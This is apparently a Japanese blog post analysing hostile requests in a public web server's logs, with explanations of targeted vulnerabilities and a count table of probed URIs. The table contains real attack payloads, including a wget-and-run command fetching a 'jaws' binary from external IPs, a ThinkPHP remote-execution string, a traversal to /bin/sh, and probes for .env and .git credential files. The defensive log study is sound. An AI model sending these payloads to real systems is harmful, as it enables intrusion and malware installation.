公開している web サーバのログから通常のアクセスではない通信について分析しました。
多かったリクエスト
PHPUnitのevalをリモート実行
PHPのユニットテストツールのPHPUnitの脆弱性を利用してのevalを実行しようとする通信
/wp-content/themes/seotheme/db.php?u
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
TOTOLINKの脆弱性
コマンドインジェクションの脆弱性があり、Miraiの攻撃に利用されている脆弱性みたいです。
TOTOLINKの新たな脆弱性がBeastmode Mirai攻撃の標的に
/cgi-bin/downloadFlile.cgi
ルータなどのネットワーク機器の調査
脆弱性が報告されているルーターなどで使われているログイン画面へアクセスする通信
JVNDB-2016-004125 - JVN iPedia - 脆弱性対策情報データベース
login.cgi
Spring Frameworkの脆弱性
Spring FrameworkのSpring Cloud Gatewayという機能の脆弱性に関する通信みたいです。
CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability
/actuator/gateway/routes
thinkPHPの脆弱性を利用した攻撃
久しぶりにthinkPHPの脆弱性を利用した攻撃がありました。
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
Wordpressの情報取集
ログイン画面の確認
/wp-login.php
/post/wp-login.php
バックドアの確認
ハッキングされたWordpressのバックドアを利用しようとしている通信
/wp-content/plugins/ioptimization/IOptimize.php?rchk
プラグイン File Managerの脆弱性
サーバ上のファイルのアップロードや削除などの操作を実行できるプラグインの脆弱性
WordPress 用プラグイン File Manager の脆弱性について
/wp-content/plugins/wp-file-upload/ROOBOTS.php
不審な通信の一覧
| uri | count |
|---|---|
| /robots.txt | 1277 |
| /ads.txt | 457 |
| /wp-content/themes/seotheme/db.php?u | 339 |
| /sw.js | 317 |
| /.env | 282 |
| /cgi-bin/downloadFlile.cgi | 269 |
| /wp-content/plugins/ioptimization/IOptimize.php?rchk | 214 |
| login.cgi | 205 |
| /dispatch.asp | 194 |
| /sellers.json | 148 |
| /wp-content/plugins/core-stab/index.php | 139 |
| * | 130 |
| /.git/config | 104 |
| /boaform/admin/formLogin | 103 |
| /wp-login.php | 91 |
| /wp-content/themes/classic/inc/index.php | 91 |
| /index.xml | 74 |
| /geoserver/web/ | 56 |
| /actuator/gateway/routes | 56 |
| /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 47 |
| mstshash=Administr | 44 |
| /aab8 | 43 |
| /aaa9 | 43 |
| /t4 | 38 |
| /client/get_targets | 33 |
| /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application | 32 |
| www.shadowserver.org:443 | 31 |
| /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f | 31 |
| /actuator/health | 29 |
| /post/wp-login.php | 27 |
| /info.php | 26 |
| /config.json | 24 |
| /app-ads.txt | 24 |
| mstshash=Domain | 23 |
| /core/.env | 23 |
| /upl.php | 22 |
| /config/getuser?index=0 | 22 |
| /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh | 22 |
| /api/.env | 22 |
| /owa/auth/logon.aspx | 21 |
| /.well-known/security.txt | 21 |
| \xC0/\xC00\xC0+\xC0,\xCC\xA8\xCC\xA9\xC0\x13\xC0\x09\xC0\x14\xC0 | 20 |
| /sitemap.xml | 20 |
| /private/api/v1/service/premaster | 20 |
| /shell?cd+/tmp;rm+-rf+*;wget+ | 19 |
| /owa/auth/x.js | 19 |
| /login.action | 19 |
| /autodiscover/autodiscover.json?@zdi/Powershell | 19 |
| /archives/2023 | 19 |
| /ab2g | 19 |
| /manager/html | 18 |
| /debug/default/view?panel=config | 18 |
| /ab2h | 18 |
| //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 18 |
| /wp-includes/wlwmanifest.xml | 17 |
| /wp-content/plugins/wp-file-upload/ROOBOTS.php | 17 |
| /wp-content/plugins/wordpresss3cll/up.php | 17 |
| /wp-content/plugins/anttt/simple.php | 17 |
| /wp-content/plugins/TOPXOH/wDR.php | 17 |
| /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws | 17 |
| /xmlrpc.php?rsd | 16 |
| /wp1/wp-includes/wlwmanifest.xml | 16 |
| /wp/wp-includes/wlwmanifest.xml | 16 |
| /wordpress/wp-includes/wlwmanifest.xml | 16 |
| /web/wp-includes/wlwmanifest.xml | 16 |
| /test/wp-includes/wlwmanifest.xml | 16 |
| /site/wp-includes/wlwmanifest.xml | 16 |
| /index2.php | 16 |
| /cms/wp-includes/wlwmanifest.xml | 16 |
| /blog/wp-includes/wlwmanifest.xml | 16 |
| /HNAP1/ | 16 |
| //.env | 16 |
| 7 | 15 |
| /shop/wp-includes/wlwmanifest.xml | 15 |
| /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws | 15 |
| /laravel/.env | 15 |
| /app/.env | 15 |
| /2019/wp-includes/wlwmanifest.xml | 15 |
| /.vscode/sftp.json | 15 |
| /users/sign_in | 14 |
| /telescope/requests | 14 |
| /server-status | 14 |
| /_profiler/phpinfo | 14 |
| /0bef | 14 |
| google.com:443 | 13 |
| /tags/burp | 13 |
| /sdk | 13 |
| /index.php | 13 |
| /geoip/ | 13 |
| /2020/wp-includes/wlwmanifest.xml | 13 |
| /.well-known/assetlinks.json | 13 |
| /tags/%E7%94%9F%E6%B4%BB | 12 |
| /phpinfo.php | 12 |
| /manager/text/list | 12 |
| /ftptest.cgi?loginuse=&loginpas= | 12 |
| /archives/2021 | 12 |
| /archives/2019 | 12 |
| /apps/.env | 12 |
| /HNAP1 | 12 |
| /.well-known/apple-app-site-association | 12 |
| /.env.production | 12 |
| /up.php | 11 |
| /main.php | 11 |
| /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | 11 |
| /geoserver | 11 |
| /development/.env | 11 |
| /.git/HEAD | 11 |
| /.env.save | 11 |
| /vendor/phpunit/phpunit/LICENSE | 10 |
| /v2/_catalog | 10 |
| /sources/.env | 10 |
| /shell.php | 10 |
| /script/.env | 10 |
| /s/138313e29383e26313e2036313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties | 10 |
| /rest/.env | 10 |
| /local/.env | 10 |
| /explore | 10 |
| /druid/index.html | 10 |
| /console/ | 10 |
| /api/search?folderIds=0 | 10 |
| /admin.php | 10 |
| /admin-app/.env | 10 |
| /_ignition/execute-solution | 10 |
| /Autodiscover/Autodiscover.xml | 10 |
| /.env.dist | 10 |
| /.DS_Store | 10 |
| default.asp | 9 |
| /wso.php | 9 |
| /wp2/wp-includes/wlwmanifest.xml | 9 |
| /website/wp-includes/wlwmanifest.xml | 9 |
| /start.shtml | 9 |
| /start.pl | 9 |
| /start.php | 9 |
